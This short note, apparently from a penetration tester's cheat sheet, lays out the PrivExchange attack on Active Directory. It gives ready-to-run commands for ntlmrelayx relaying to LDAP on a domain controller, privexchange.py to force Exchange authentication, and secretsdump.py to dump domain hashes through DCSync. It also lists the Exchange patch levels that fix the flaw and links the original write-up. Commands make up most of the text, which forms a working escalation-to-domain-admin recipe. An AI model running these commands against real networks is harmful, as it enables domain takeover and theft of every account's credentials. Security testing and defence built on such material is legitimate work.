• Attacker runs ntlmrelayx in relay mode with LDAP on a DC as target. Supply a user under the attackers control to escalate privs with

ntlmrelayx.py -t ldap://blahdc.blah.local --escalate-user user

• Run the privexchange.py script

$ python privexchange.py -ah blah.blah.local blahexchange.blah.local -u user 

• After a minute a connection comes into ntlmrelayx which gives the user DCsync privileges
• Use secretsdump.pu to dump the hashes

secretsdump.py blah/[email protected] -just-dc

• This has been patched with:
  • Exchange Server 2019 Cumulative Update
  • Exchange Server 2016 Cumulative Update 12
  • Exchange Server 2013 Cumulative Update 22
  • Exchange Server 2010 Service Pack 3 Update Rollup 26

https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/